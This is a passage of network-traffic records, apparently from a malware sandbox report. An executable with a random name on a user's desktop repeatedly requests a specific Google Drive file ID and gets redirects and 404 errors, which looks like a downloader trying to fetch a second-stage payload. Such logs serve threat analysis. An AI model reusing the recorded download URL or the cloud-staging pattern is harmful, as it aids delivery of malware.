                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:36:07 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WwnSn6fL4NU_PoZsH-swSA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          44 | 192.168.11.20 | 49790 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:36:18 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:36:19 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:36:18 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-WT6SRMw2JIa0va5513nRIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          45 | 192.168.11.20 | 49791 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:36:19 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:36:19 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFIdbgTxrKg_PRcbJuMiP9sWAXU45uDqcUXmDcebcjGHi5kR3BhScNA5rP936s04pD8kdGx7
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:36:19 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-dsAg3u2m1n6G9y7LcDmY-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:36:19 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bOtB4egMtxGSHuviOIsmHA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          46 | 192.168.11.20 | 49792 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:36:29 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:36:30 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:36:30 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-RJVXOAvbVr4X4TpUcaIRyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          47 | 192.168.11.20 | 49793 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:36:30 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:36:30 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC5fZLTZMvvAK6xJxCXVMWo0ALSuyc8p4cXLMX1B9WfDre_7bi_eVaENdNN0gvaULsE5
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:36:30 GMT
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: script-src 'nonce--MbIMg8M0Mr0djtKj4o1Nw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:36:30 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LGlVpdien2hLxO2v2w86uQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          48 | 192.168.11.20 | 49794 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:36:41 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:36:41 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:36:41 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-j7SfN3v38IA6e10nhmPypg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          49 | 192.168.11.20 | 49795 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:36:41 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:36:42 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC5SHfOai1a0h7QW1V-BQfkOms-9u5QPqmXUzlupK8-GYJHLCAp0Fcaw8L5dmHc999FG
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:36:41 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-tpo13ul6SnSk2J4xPFQsHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:36:42 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="M6ma_7pDd52ZadINbTUVQw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          50 | 192.168.11.20 | 49796 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:36:52 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:36:52 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:36:52 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: script-src 'nonce-jsuVxbN-1PPKQ9QnzyoD-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          51 | 192.168.11.20 | 49797 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:36:52 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:36:53 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC4rpgtBfhYJB1A2KOau2u4CO-QRuHFjT_6hYVOEdy7y6IWSG3VOcTAoCXXnwOQqIbjd
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:36:53 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-bu_VVRdt6hU3qlDZVPM7fA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:36:53 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Lz5NdZ2a7hndnZ2i0u-wTA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          52 | 192.168.11.20 | 49798 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:37:03 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:37:03 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
